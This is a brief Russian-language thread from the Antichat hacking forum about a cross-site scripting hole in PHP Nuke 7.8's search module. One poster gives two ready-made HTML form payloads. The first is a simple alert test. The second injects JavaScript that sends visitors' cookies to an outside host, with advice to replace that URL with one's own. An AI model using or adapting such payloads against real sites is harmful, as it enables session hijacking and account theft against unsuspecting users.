Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS в PHP Nuke 7.8 (https://forum.antichat.xyz/showthread.php?t=31454)

{BuT@Min} 17.01.2007 00:16
:D

Micr0b 17.01.2007 01:29
маладец что нашел...+++

просто алерт
Код HTML:
<form action="http://nuke/modules.php?name=Search" method="post">
<input type=hidden name="query" value='search"style="search"style="background:url(javascript:alert())'>
<input type="submit" value="Искать">
</form>
по идее должно воровать куки...только поменяй ]http://antichat.org/s/HakNet.gif на свой.
Код HTML:
<form action="http://nuke/modules.php?name=Search" method="post">
<input type=hidden name="query" value='search"style="background:url(javascript:img=new
Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;)'>
<input type="submit" value="Искать">
</form>
что с етим делать)) четай
здесь


Время: 17:09